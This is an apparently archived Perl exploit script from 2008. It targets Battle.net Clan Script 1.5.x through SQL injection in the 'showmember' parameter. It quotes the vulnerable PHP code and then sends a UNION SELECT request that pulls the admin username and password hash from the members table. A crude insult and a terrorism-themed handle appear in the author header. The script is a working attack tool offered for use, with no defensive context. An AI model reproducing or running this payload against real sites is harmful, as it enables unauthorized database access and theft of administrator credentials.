battlenet15x-sql.txt
Posted on 13 May 2008
#!/usr/bin/perl -w # download script : http://sourceforge.net/project/showfiles.php?group_id=142506&package_id=156487 ############################################################## # Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit # ############################################################## ######################################## #[*] Founded by : Stack-Terrorist [v40] #[*] Contact: Ev!L #[*] Greetz : Houssamix & All muslims HaCkeRs :) #[*] Fuck : JosS :@ ######################################## # vulnerable page ######################################## #<div id="header"><h1><?php echo $site_name ?></h1></div> #<div id="gutter"></div> #<div id="col1"> # <?php showNav(); ?>#div> #<div id="col2"> # <?php # if(!isset($_GET['showmember'])) # { ?> # <h2>Members</h2> # <table id="members"> # <tr> # <th>Rank</th> # <th>Member Name</th> # <th>Email</th> # <th>Date Joined</th> # </tr> # <?php#mysql_select_db($mysql_db) or die(mysql_error()); # $sql = 'SELECT bcs_members.id, bcs_members.name, bcs_members.email, bcs_members.date, bcs_ranks.'order', bcs_ranks.name AS rank ' # . 'FROM bcs_members, bcs_ranks WHERE bcs_members.rank = bcs_ranks.id ORDER BY 'order', id'; # $alt = 0; # $result = mysql_query($sql) or die(mysql_error()); # while($r=mysql_fetch_array($result)) # { # $id=$r["id"]; # $name=$r["name"]; # $rank=$r["rank"]; ## $email=$r["email"]; # $recruit=$r["recruit"]; # $date=$r["date"]; # if($recruit === '') { $recruit = ' '; } # if ($alt % 2 == 0) { echo '<tr class="altrow">' . " "; } ## else { echo '<tr>' . " "; } # echo '<td>' . $rank . '</td>' . " "; # echo '<td><a href="?page=members&showmember=' . $name . '">' . $name . '</a></td>' . " "; ## if($email === '') { echo '<td>n/a</td>' . " "; } # else { echo '<td><a href="mailto:' . $email . '">Email</a></td>' . " "; } # echo '<td>' . date("F d, Y", strtotime($date)) . '</td>' . " "; # echo '</tr>' . " "; # $alt = $alt + 1; #} #?> #</table> # <?php #} // end of if $_GET #else #{?> # <h2>Member Details</h2> # <table id="members"> # <tr> # <th>Rank</th> # <th>Member Name</th> # <th>Email</th> # <th>Date Joined</th> # </tr> # <tr> # <?php # mysql_connect($mysql_host, $mysql_user, $mysql_pass) or die(mysql_error()); # mysql_select_db($mysql_db) or die(mysql_error()); # $sql = "SELECT 'bcs_members'.'name', 'bcs_members'.'email', 'bcs_members'.'date', 'bcs_ranks'.'name' AS 'rank'" # . "FROM 'bcs_members', 'bcs_ranks' WHERE 'bcs_members'.'rank' = 'bcs_ranks'.'id' AND 'bcs_members'.'name' = '" . $_GET['showmember'] . "'"; # $result = mysql_query($sql) or die(mysql_error()); # $r=mysql_fetch_array($result); # echo '<td>' . $r["rank"] . '</td>' . " "; # echo '<td>' . $r["name"] . '</td>' . " "; # if($r["email"] === '') { echo '<td>n/a</td>' . " "; } # else { echo '<td><a href="mailto:' . $r["email"] . '">Email</a></td>' . " "; } # echo '<td>' . date("F d, Y", strtotime($r["date"])) . '</td>' . " "; # ?> # </tr> #</table> #<br/> #<h2>Medals</h2> #<table id="members"> # <tr> # <th>Medal</th> # <th>Medal Name</th> # <th>Description</th> # </tr> # <tr> # <?php # $alt = 0; # $sql = 'SELECT 'bcs_medals' . 'path' , 'bcs_medals' . 'name' , 'bcs_medals' . 'description' ' # . ' FROM 'bcs_medals' , 'bcs_members' , 'bcs_medal_list' ' # . " WHERE 'bcs_members' . 'name' = '" . $_GET['showmember'] . "'" # . ' AND 'bcs_medal_list' . 'mem_id' = 'bcs_members' . 'id' ' # . ' AND 'bcs_medal_list' . 'medal' = 'bcs_medals' . 'id' '; # $result = mysql_query($sql) or die(mysql_error()); # while($r=mysql_fetch_array($result)) # { # $id=$r["id"]; # $name=$r["name"]; # $path=$r["path"]; # $desc=$r["description"]; # if ($alt % 2 == 0) { echo '<tr class="altrow">' . " "; } # else { echo '<tr>' . " "; } # echo '<td class="center"><img src="' . $path . '" alt="' . $name . '"/></td>' . " "; # echo "<td>" . $name . "</td> "; # echo "<td>" . $desc . "</td> "; # echo "</tr> "; # $alt = $alt + 1; #}?> # </tr> # </table> # <?php # echo "<br/> "; # echo "<h2>Recruited</h2> "; # $result = mysql_query("SELECT bcs_members.name FROM bcs_members, (SELECT id FROM bcs_members WHERE name = '" . $_GET['showmember'] . "') AS results " # . "WHERE results.id = bcs_members.recruit") or die(mysql_error()); # while($r=mysql_fetch_array($result)) # { # echo $r["name"] . "<br/> "; # } # } # ?> #</div> #<div id="footer"><?php echo $release; ?></div>*/ #----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------# system("color a"); print " ############################################################ "; print " # Battle.net Clan Script <= 1.5.x - Remote SQL Inj Exploit # "; print " # by Stack-Terrorist [v40] # "; print " ############################################################ "; use LWP::UserAgent; die "Example: perl $0 http://victim.com/ " unless @ARGV; system("color f"); #the username of joomla $user="name"; #the pasword of joomla $pass="password"; #the tables of joomla $tab="bcs_members"; $b = LWP::UserAgent->new() or die "Could not initialize browser "; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $ARGV[0] . "/?page=members&showmember=-1'%20union%20select%20".$pass.",user(),44,".$user."+from+".$tab."+where+id=1/*"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<td>(.*?)</td>/){ print " Brought to you by v4-team.com... "; print " [+] Admin User : $1"; } if ($answer =~/([0-9a-fA-F]{32})/){print " [+] Admin Hash : $1 "; print " # Exploit has ben aported user and password hash # ";} else{print " [-] Exploit Failed... ";} # exploit exploited by Stack-Terrorist
